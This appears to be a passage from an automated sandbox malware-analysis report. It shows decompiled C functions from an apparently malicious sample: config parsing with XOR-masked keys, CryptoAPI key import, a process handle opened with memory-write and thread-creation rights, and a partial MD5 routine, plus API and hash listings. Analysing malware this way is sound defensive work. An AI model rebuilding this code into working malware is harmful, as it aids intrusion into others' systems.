                            • Instruction Fuzzy Hash: 50113B77600701ABD721BBA9CC80CAF77BCAF88304700413EEA42B7661EAB4ED058794
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D3A53(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                            				void* _t21;
                            				void* _t22;
                            				signed int _t24;
                            				intOrPtr* _t26;
                            				void* _t27;
                            
                            				_t26 = __edi; /* 0x006d3a53 */
                            				if(_a4 == 0) { /* 0x006d3a5b */
                            					L2: /* 0x006d3a72 */
                            					_t27 = E006D78B3(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12); /* 0x006d3a8d */
                            					if(_t27 == 0) { /* 0x006d3a91 */
                            						_t24 = _a12 >> 1; /* 0x006d3a96 */
                            						if(_t24 == 0) { /* 0x006d3a98 */
                            							_t27 = 2; /* 0x006d3aaa */
                            							HeapFree( *0x6da2d8, 0, _a4); /* 0x006d3ab6 */
                            						} else { /* 0x006d3a9a */
                            							_t21 = _a4; /* 0x006d3a9a */
                            							 *((short*)(_t21 + _t24 * 2 - 2)) = 0; /* 0x006d3a9f */
                            							 *_t26 = _t21; /* 0x006d3aa4 */
                            						} /* 0x006d3aa4 */
                            					} /* 0x006d3a98 */
                            					L6: /* 0x006d3abc */
                            					return _t27; /* 0x006d3ac0 */
                            				} /* 0x006d3ac0 */
                            				_t22 = E006D5BB5(_a4, _a8, _a12, __edi); /* 0x006d3a67 */ // executed
                            				_t27 = _t22; /* 0x006d3a6c */
                            				if(_t27 == 0) { /* 0x006d3a70 */
                            					goto L6; /* 0x00000000 */
                            				} /* 0x00000000 */
                            				goto L2; /* 0x00000000 */
                            			}

                            APIs
                              • Part of subcall function 006D5BB5: SysFreeString.OLEAUT32(00000000), ref: 006D5C18
                            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74D0F710,?,00000000,?,00000000,?,006D623B,?,004F0053,014A93D8,00000000,?), ref: 006D3AB6
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Free$HeapString
                            • String ID:
                            • API String ID: 3806048269-0
                            • Opcode ID: d245e0a0ee7c2381336d5e2ed517d2b5e9d945c79cb10e2679bd08dab57947dd
                            • Instruction ID: 0ca425a10939fdce6c5d91879d760c73300a1baf0808646512bd89d220d612e4
                            • Opcode Fuzzy Hash: d245e0a0ee7c2381336d5e2ed517d2b5e9d945c79cb10e2679bd08dab57947dd
                            • Instruction Fuzzy Hash: EF014F32901529BBCB229F94CC01FEA3B6AEF44750F09802AFE059E320D731DA60DBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E006D44D8(void* __ecx, void* __edx, void* _a4, void* _a8) {
                            				void* _t13;
                            				void* _t21;
                            
                            				_t11 =  &_a4; /* 0x006d44e0 */
                            				_t21 = 0; /* 0x006d44e7 */
                            				__imp__( &_a8); /* 0x006d44e9 */
                            				_t13 = E006D47E5( &_a4 + 1, 1, _a8, _a4, _a4, _t11); /* 0x006d44f8 */ // executed
                            				if(_t13 == 0) { /* 0x006d44ff */
                            					_t21 = E006D7A71(_a8 + _a8); /* 0x006d450e */
                            					if(_t21 != 0) { /* 0x006d4512 */
                            						E006D4456(_a4, _t21, _t23); /* 0x006d4519 */
                            					} /* 0x006d4519 */
                            					E006D789E(_a4); /* 0x006d4521 */
                            				} /* 0x006d4526 */
                            				return _t21; /* 0x006d452b */
                            			}

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,006D3831,00000000,?,006D22E5,00000000,006D3831,?,7491C740,006D3831,00000000,014A9600), ref: 006D44E9
                              • Part of subcall function 006D47E5: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,006D44FD,00000001,006D3831,00000000), ref: 006D481D
                              • Part of subcall function 006D47E5: memcpy.NTDLL(006D44FD,006D3831,00000010,?,?,?,006D44FD,00000001,006D3831,00000000,?,006D22E5,00000000,006D3831,?,7491C740), ref: 006D4836
                              • Part of subcall function 006D47E5: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 006D485F
                              • Part of subcall function 006D47E5: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 006D4877
                              • Part of subcall function 006D47E5: memcpy.NTDLL(00000000,7491C740,014A9600,00000010), ref: 006D48C9
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                            • String ID:
                            • API String ID: 894908221-0
                            • Opcode ID: 483ddce791861ab0bcb43f674e8dd1beb633dbcfe4064a7cf0937d103d59c2d2
                            • Instruction ID: debfeb52e77f193027568ad149fcc8dd5609eac882fd5efc769330ef9deceec1
                            • Opcode Fuzzy Hash: 483ddce791861ab0bcb43f674e8dd1beb633dbcfe4064a7cf0937d103d59c2d2
                            • Instruction Fuzzy Hash: 28F03A36900109BBCF11AE65DC40DEA3BAFEF853A0B008027FD18CA211EA31DA559BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D187F(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                            				void* _t17;
                            
                            				if(_a4 == 0) { /* 0x006d1887 */
                            					L2: /* 0x006d18a1 */
                            					return E006D53C8(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2); /* 0x00000000 */
                            				} /* 0x006d18bd */
                            				_t17 = E006D5B4A(_a4, _a8, _a12, _a16, _a20); /* 0x006d1898 */ // executed
                            				if(_t17 != 0) { /* 0x006d189f */
                            					goto L2; /* 0x00000000 */
                            				} /* 0x00000000 */
                            				return _t17; /* 0x006d18c4 */
                            			}

                            APIs
                            • lstrlenW.KERNEL32(?,?,?,006D24FA,3D006D90,80000002,006D68B1,006D1629,74666F53,4D4C4B48,006D1629,?,3D006D90,80000002,006D68B1,?), ref: 006D18A4
                              • Part of subcall function 006D5B4A: SysAllocString.OLEAUT32(006D1629), ref: 006D5B63
                              • Part of subcall function 006D5B4A: SysFreeString.OLEAUT32(00000000), ref: 006D5BA4
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: String$AllocFreelstrlen
                            • String ID:
                            • API String ID: 3808004451-0
                            • Opcode ID: 4647e31a804ee6ee57b2d75f8a0f94d6b37e8ca57eacab935fc714d0fac69085
                            • Instruction ID: 184a86e58f80a56c908ce0558597b66191b4656a8c6c70f84e0acf9c0845dc04
                            • Opcode Fuzzy Hash: 4647e31a804ee6ee57b2d75f8a0f94d6b37e8ca57eacab935fc714d0fac69085
                            • Instruction Fuzzy Hash: F8F0283240020EBFDF169F90DC45EDA7F6BAB18355F048016FA1554171D772D971EBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D1EDF(void* __edi, void* _a4) {
                            				int _t7;
                            				int _t12;
                            
                            				_t7 = E006D2554(__edi, _a4,  &_a4); /* 0x006d1eeb */ // executed
                            				_t12 = _t7; /* 0x006d1ef0 */
                            				if(_t12 != 0) { /* 0x006d1ef4 */
                            					memcpy(__edi, _a4, _t12); /* 0x006d1efb */
                            					 *((char*)(__edi + _t12)) = 0; /* 0x006d1f06 */
                            					E006D789E(_a4); /* 0x006d1f0a */
                            				} /* 0x006d1f0a */
                            				return _t12; /* 0x006d1f13 */
                            			}

                            APIs
                              • Part of subcall function 006D2554: memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,006D654A,?), ref: 006D258A
                              • Part of subcall function 006D2554: memset.NTDLL ref: 006D25FF
                              • Part of subcall function 006D2554: memset.NTDLL ref: 006D2613
                            • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,006D654A,?,?,?,?), ref: 006D1EFB
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: memcpymemset$FreeHeap
                            • String ID:
                            • API String ID: 3053036209-0
                            • Opcode ID: 354e82b3729c88b3849fff83588d67cae228243e3ce2c20625a123195fbfe569
                            • Instruction ID: c5f20f35bafb127bf0b020194f4e4a7c6cdca69491754580d323ce564b1a7ed0
                            • Opcode Fuzzy Hash: 354e82b3729c88b3849fff83588d67cae228243e3ce2c20625a123195fbfe569
                            • Instruction Fuzzy Hash: 71E0863380416977CB122A94DC41DEB7F5E8F51791F04402AFE0849305D731C61097E6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E006D2792(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                            				int _v8;
                            				void* _v12;
                            				void* _v16;
                            				signed int _t28;
                            				signed int _t33;
                            				signed int _t39;
                            				char* _t45;
                            				char* _t46;
                            				char* _t47;
                            				char* _t48;
                            				char* _t49;
                            				char* _t50;
                            				void* _t51;
                            				void* _t52;
                            				void* _t53;
                            				intOrPtr _t54;
                            				void* _t56;
                            				intOrPtr _t57;
                            				intOrPtr _t58;
                            				signed int _t61;
                            				intOrPtr _t64;
                            				signed int _t65;
                            				signed int _t70;
                            				void* _t72;
                            				void* _t73;
                            				signed int _t75;
                            				signed int _t78;
                            				signed int _t82;
                            				signed int _t86;
                            				signed int _t90;
                            				signed int _t94;
                            				signed int _t98;
                            				void* _t101;
                            				void* _t102;
                            				void* _t115;
                            				void* _t118;
                            				intOrPtr _t121;
                            
                            				_t118 = __esi;
                            				_t115 = __edi;
                            				_t104 = __ecx;
                            				_t101 = __ebx;
                            				_t28 =  *0x6da344; // 0x69b25f44
                            				if(E006D1696( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                            					 *0x6da374 = _v8;
                            				}
                            				_t33 =  *0x6da344; // 0x69b25f44
                            				if(E006D1696( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                            					_v12 = 2;
                            					L69:
                            					return _v12;
                            				}
                            				_t39 =  *0x6da344; // 0x69b25f44
                            				_push(_t115);
                            				if(E006D1696( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                            					L67:
                            					HeapFree( *0x6da2d8, 0, _v16);
                            					goto L69;
                            				} else {
                            					_push(_t101);
                            					_t102 = _v12;
                            					if(_t102 == 0) {
                            						_t45 = 0;
                            					} else {
                            						_t98 =  *0x6da344; // 0x69b25f44
                            						_t45 = E006D2A59(_t104, _t102, _t98 ^ 0x7895433b);
                            					}
                            					_push(_t118);
                            					if(_t45 != 0) {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                            							 *0x6da2e0 = _v8;
                            						}
                            					}
                            					if(_t102 == 0) {
                            						_t46 = 0;
                            					} else {
                            						_t94 =  *0x6da344; // 0x69b25f44
                            						_t46 = E006D2A59(_t104, _t102, _t94 ^ 0x219b08c7);
                            					}
                            					if(_t46 != 0) {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                            							 *0x6da2e4 = _v8;
                            						}
                            					}
                            					if(_t102 == 0) {
                            						_t47 = 0;
                            					} else {
                            						_t90 =  *0x6da344; // 0x69b25f44
                            						_t47 = E006D2A59(_t104, _t102, _t90 ^ 0x31fc0661);
                            					}
                            					if(_t47 != 0) {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                            							 *0x6da2e8 = _v8;
                            						}
                            					}
                            					if(_t102 == 0) {
                            						_t48 = 0;
                            					} else {
                            						_t86 =  *0x6da344; // 0x69b25f44
                            						_t48 = E006D2A59(_t104, _t102, _t86 ^ 0x0cd926ce);
                            					}
                            					if(_t48 != 0) {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                            							 *0x6da004 = _v8;
                            						}
                            					}
                            					if(_t102 == 0) {
                            						_t49 = 0;
                            					} else {
                            						_t82 =  *0x6da344; // 0x69b25f44
                            						_t49 = E006D2A59(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                            					}
                            					if(_t49 != 0) {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                            							 *0x6da02c = _v8;
                            						}
                            					}
                            					if(_t102 == 0) {
                            						_t50 = 0;
                            					} else {
                            						_t78 =  *0x6da344; // 0x69b25f44
                            						_t50 = E006D2A59(_t104, _t102, _t78 ^ 0x2878b929);
                            					}
                            					if(_t50 == 0) {
                            						L41:
                            						 *0x6da2ec = 5;
                            						goto L42;
                            					} else {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                            							goto L41;
                            						} else {
                            							L42:
                            							if(_t102 == 0) {
                            								_t51 = 0;
                            							} else {
                            								_t75 =  *0x6da344; // 0x69b25f44
                            								_t51 = E006D2A59(_t104, _t102, _t75 ^ 0x261a367a);
                            							}
                            							if(_t51 != 0) {
                            								_push(_t51);
                            								_t72 = 0x10;
                            								_t73 = E006D18F5(_t72);
                            								if(_t73 != 0) {
                            									_push(_t73);
                            									E006D731D();
                            								}
                            							}
                            							if(_t102 == 0) {
                            								_t52 = 0;
                            							} else {
                            								_t70 =  *0x6da344; // 0x69b25f44
                            								_t52 = E006D2A59(_t104, _t102, _t70 ^ 0xb9d404b2);
                            							}
                            							if(_t52 != 0 && E006D18F5(0, _t52) != 0) {
                            								_t121 =  *0x6da3cc; // 0x14a9600
                            								E006D3D80(_t121 + 4, _t68);
                            							}
                            							if(_t102 == 0) {
                            								_t53 = 0;
                            							} else {
                            								_t65 =  *0x6da344; // 0x69b25f44
                            								_t53 = E006D2A59(_t104, _t102, _t65 ^ 0x3df17130);
                            							}
                            							if(_t53 == 0) {
                            								L59:
                            								_t54 =  *0x6da348; // 0xdcd5a8
                            								_t22 = _t54 + 0x6db252; // 0x616d692f
                            								 *0x6da370 = _t22;
                            								goto L60;
                            							} else {
                            								_t64 = E006D18F5(0, _t53);
                            								 *0x6da370 = _t64;
                            								if(_t64 != 0) {
                            									L60:
                            									if(_t102 == 0) {
                            										_t56 = 0;
                            									} else {
                            										_t61 =  *0x6da344; // 0x69b25f44
                            										_t56 = E006D2A59(_t104, _t102, _t61 ^ 0xd2079859);
                            									}
                            									if(_t56 == 0) {
                            										_t57 =  *0x6da348; // 0xdcd5a8
                            										_t23 = _t57 + 0x6db79e; // 0x6976612e
                            										_t58 = _t23;
                            									} else {
                            										_t58 = E006D18F5(0, _t56);
                            									}
                            									 *0x6da3e0 = _t58;
                            									HeapFree( *0x6da2d8, 0, _t102);
                            									_v12 = 0;
                            									goto L67;
                            								}
                            								goto L59;
                            							}
                            						}
                            					}
                            				}
                            			}
                            0x006d2792
                            0x006d2792
                            0x006d2792
                            0x006d2792
                            0x006d2795
                            0x006d27b2
                            0x006d27c0
                            0x006d27c0
                            0x006d27c5
                            0x006d27df
                            0x006d2a4d
                            0x006d2a54
                            0x006d2a58
                            0x006d2a58
                            0x006d27e5
                            0x006d27ea
                            0x006d2802
                            0x006d2a3a
                            0x006d2a44
                            0x00000000
                            0x006d2808
                            0x006d2808
                            0x006d2809
                            0x006d280e
                            0x006d2824
                            0x006d2810
                            0x006d2810
                            0x006d281d
                            0x006d281d
                            0x006d2826
                            0x006d282f
                            0x006d2831
                            0x006d283b
                            0x006d2840
                            0x006d2840
                            0x006d283b
                            0x006d2847
                            0x006d285d
                            0x006d2849
                            0x006d2849
                            0x006d2856
                            0x006d2856
                            0x006d2861
                            0x006d2863
                            0x006d286d
                            0x006d2872
                            0x006d2872
                            0x006d286d
                            0x006d2879
                            0x006d288f
                            0x006d287b
                            0x006d287b
                            0x006d2888
                            0x006d2888
                            0x006d2893
                            0x006d2895
                            0x006d289f
                            0x006d28a4
                            0x006d28a4
                            0x006d289f
                            0x006d28ab
                            0x006d28c1
                            0x006d28ad
                            0x006d28ad
                            0x006d28ba
                            0x006d28ba
                            0x006d28c5
                            0x006d28c7
                            0x006d28d1
                            0x006d28d6
                            0x006d28d6
                            0x006d28d1
                            0x006d28dd
                            0x006d28f3
                            0x006d28df
                            0x006d28df
                            0x006d28ec
                            0x006d28ec
                            0x006d28f7
                            0x006d28f9
                            0x006d2903
                            0x006d2908
                            0x006d2908
                            0x006d2903
                            0x006d290f
                            0x006d2925
                            0x006d2911
                            0x006d2911
                            0x006d291e
                            0x006d291e
                            0x006d2929
                            0x006d293c
                            0x006d293c
                            0x00000000
                            0x006d292b
                            0x006d292b
                            0x006d2935
                            0x00000000
                            0x006d2946
                            0x006d2946
                            0x006d2948
                            0x006d295e
                            0x006d294a
                            0x006d294a
                            0x006d2957
                            0x006d2957
                            0x006d2962
                            0x006d2964
                            0x006d2967
                            0x006d2968
                            0x006d296f
                            0x006d2971
                            0x006d2972
                            0x006d2972
                            0x006d296f
                            0x006d2979
                            0x006d298f
                            0x006d297b
                            0x006d297b
                            0x006d2988
                            0x006d2988
                            0x006d2993
                            0x006d29a1
                            0x006d29ab
                            0x006d29ab
                            0x006d29b3
                            0x006d29c9
                            0x006d29b5
                            0x006d29b5
                            0x006d29c2
                            0x006d29c2
                            0x006d29cd
                            0x006d29e0
                            0x006d29e0
                            0x006d29e5
                            0x006d29eb
                            0x00000000
                            0x006d29cf
                            0x006d29d2
                            0x006d29d7
                            0x006d29de
                            0x006d29f0
                            0x006d29f2
                            0x006d2a08
                            0x006d29f4
                            0x006d29f4
                            0x006d2a01
                            0x006d2a01
                            0x006d2a0c
                            0x006d2a18
                            0x006d2a1d
                            0x006d2a1d
                            0x006d2a0e
                            0x006d2a11
                            0x006d2a11
                            0x006d2a2b
                            0x006d2a30
                            0x006d2a36
                            0x00000000
                            0x006d2a39
                            0x00000000
                            0x006d29de
                            0x006d29cd
                            0x006d2935
                            0x006d2929

                            APIs
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,006DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 006D2837
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,006DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 006D2869
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,006DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 006D289B
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,006DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 006D28CD
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,006DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 006D28FF
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,006DA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 006D2931
                            • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 006D2A30
                            • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 006D2A44
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: 843cadaf1ccce869031acc0d94b8a004d671fcb7b14df2e1351e1fe190c4a1dc
                            • Instruction ID: dbaa9717866c2decb1b925def044651d69ca2db2c404e1acde17e0eb7ae7d38c
                            • Opcode Fuzzy Hash: 843cadaf1ccce869031acc0d94b8a004d671fcb7b14df2e1351e1fe190c4a1dc
                            • Instruction Fuzzy Hash: 1A81D370E04206EBCB20DBF5CDA4DAB77BBAB6C700B28192BA001DB314E675DD459B65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004012B0() {
                            				void* _t1;
                            				unsigned int _t3;
                            				void* _t4;
                            				long _t5;
                            				void* _t6;
                            				intOrPtr _t10;
                            				void* _t14;
                            
                            				_t10 =  *0x403170;
                            				_t1 = CreateEventA(0, 1, 0, 0); // manual-reset, initially non-signalled, unnamed event kept in a global
                            				 *0x40317c = _t1;
                            				if(_t1 == 0) {
                            					return GetLastError();
                            				}
                            				// GetVersion() packs the major version in the low byte and the minor version in the next byte.
                            				// The decompiler prints the compare against the whole dword, but the three-way branch below
                            				// reads as a byte-wise test: major > 5, or major == 5 and minor > 0. Anything older than 5.1
                            				// (Windows XP) is refused with 0x32 == ERROR_NOT_SUPPORTED.
                            				_t3 = GetVersion();
                            				if(_t3 != 5) {
                            					L4:
                            					if(_t14 <= 0) {
                            						_t4 = 0x32; // ERROR_NOT_SUPPORTED
                            						return _t4;
                            					} else {
                            						goto L5;
                            					}
                            				} else {
                            					if(_t3 >> 8 > 0) {
                            						L5:
                            						 *0x40316c = _t3;
                            						_t5 = GetCurrentProcessId();
                            						 *0x403168 = _t5;
                            						 *0x403170 = _t10;
                            						// 0x10047a == SYNCHRONIZE | PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE | PROCESS_VM_WRITE
                            						//           | PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD:
                            						// a real handle to its own process with rights that allow writing memory and creating threads in it.
                            						_t6 = OpenProcess(0x10047a, 0, _t5);
                            						 *0x403164 = _t6;
                            						if(_t6 == 0) {
                            							// fall back to (HANDLE)-1, the pseudo-handle GetCurrentProcess() returns
                            							 *0x403164 =  *0x403164 | 0xffffffff;
                            						}
                            						return 0;
                            					} else {
                            						_t14 = _t3 - _t3;
                            						goto L4;
                            					}
                            				}
                            			}

                            Instruction addresses for the C code above, one per statement in source order: 0x004012b1 to 0x00401323 (0x00000000 marks a synthesized statement with no address).

                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040149E), ref: 004012BF
                            • GetVersion.KERNEL32 ref: 004012CE
                            • GetCurrentProcessId.KERNEL32 ref: 004012EA
                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401303
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: Process$CreateCurrentEventOpenVersion
                            • String ID:
                            • API String ID: 845504543-0
                            • Opcode ID: bccdd13247b34069af90feaf87c411da224cdf72da21f721717c303359e1be4a
                            • Instruction ID: b8cc09b8ad51b93fadf4e457bac6bf592bf8967fcaec5ad48abf734a1226aae7
                            • Opcode Fuzzy Hash: bccdd13247b34069af90feaf87c411da224cdf72da21f721717c303359e1be4a
                            • Instruction Fuzzy Hash: 4EF019309403019BE7209FB8BE1DB963BA9A749712F14017AE651FA2F0D7B48A41CB5C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 49%
                            			E006D2DCC(void* __ecx, void* _a4) {
                            				// MD5 block transform. __ecx points at a 64-byte message block, _a4 at the four
                            				// state words A,B,C,D (offsets 0, 4, 8, 0xc). The signed immediates below are the 64
                            				// MD5 T[i] constants printed as signed ints (e.g. -0x28955b88 == 0xd76aa478), and the
                            				// rotate counts are the standard 7/12/17/22, 5/9/14/20, 4/11/16/23, 6/10/15/21
                            				// ("ror edx, 0xf" is the decompiler's rendering of rol 17, "ror esi, 0xa" of rol 22).
                            				signed int _v8;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				intOrPtr _v44;
                            				intOrPtr _v48;
                            				intOrPtr _v52;
                            				intOrPtr _v56;
                            				intOrPtr _v60;
                            				intOrPtr _v64;
                            				intOrPtr _v68;
                            				intOrPtr _v72;
                            				void _v76;
                            				intOrPtr* _t226;
                            				signed int _t229;
                            				signed int _t231;
                            				signed int _t233;
                            				signed int _t235;
                            				signed int _t237;
                            				signed int _t239;
                            				signed int _t241;
                            				signed int _t243;
                            				signed int _t245;
                            				signed int _t247;
                            				signed int _t249;
                            				signed int _t251;
                            				signed int _t253;
                            				signed int _t255;
                            				signed int _t257;
                            				signed int _t259;
                            				signed int _t338;
                            				signed char* _t348;
                            				signed int _t349;
                            				signed int _t351;
                            				signed int _t353;
                            				signed int _t355;
                            				signed int _t357;
                            				signed int _t359;
                            				signed int _t361;
                            				signed int _t363;
                            				signed int _t365;
                            				signed int _t367;
                            				signed int _t376;
                            				signed int _t378;
                            				signed int _t380;
                            				signed int _t382;
                            				signed int _t384;
                            				intOrPtr* _t400;
                            				signed int* _t401;
                            				signed int _t402;
                            				signed int _t404;
                            				signed int _t406;
                            				signed int _t408;
                            				signed int _t410;
                            				signed int _t412;
                            				signed int _t414;
                            				signed int _t416;
                            				signed int _t418;
                            				signed int _t420;
                            				signed int _t422;
                            				signed int _t424;
                            				signed int _t432;
                            				signed int _t434;
                            				signed int _t436;
                            				signed int _t438;
                            				signed int _t440;
                            				signed int _t508;
                            				signed int _t599;
                            				signed int _t607;
                            				signed int _t613;
                            				signed int _t679;
                            				void* _t682;
                            				signed int _t683;
                            				signed int _t685;
                            				signed int _t690;
                            				signed int _t692;
                            				signed int _t697;
                            				signed int _t699;
                            				signed int _t718;
                            				signed int _t720;
                            				signed int _t722;
                            				signed int _t724;
                            				signed int _t726;
                            				signed int _t728;
                            				signed int _t734;
                            				signed int _t740;
                            				signed int _t742;
                            				signed int _t744;
                            				signed int _t746;
                            				signed int _t748;
                            
                            				_t1 =  &_a4; // 0x6d35ee
                            				_t226 =  *_t1;
                            				_t348 = __ecx + 2;
                            				_t401 =  &_v76;
                            				_t682 = 0x10;
                            				do {
                            					// gather 16 little-endian dwords from the block: _v76 is M[0], _v72 is M[1], ... _v16 is M[15]
                            					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                            					_t401 =  &(_t401[1]);
                            					_t348 =  &(_t348[4]);
                            					_t682 = _t682 - 1;
                            				} while (_t682 != 0);
                            				_t683 =  *(_t226 + 4); // B
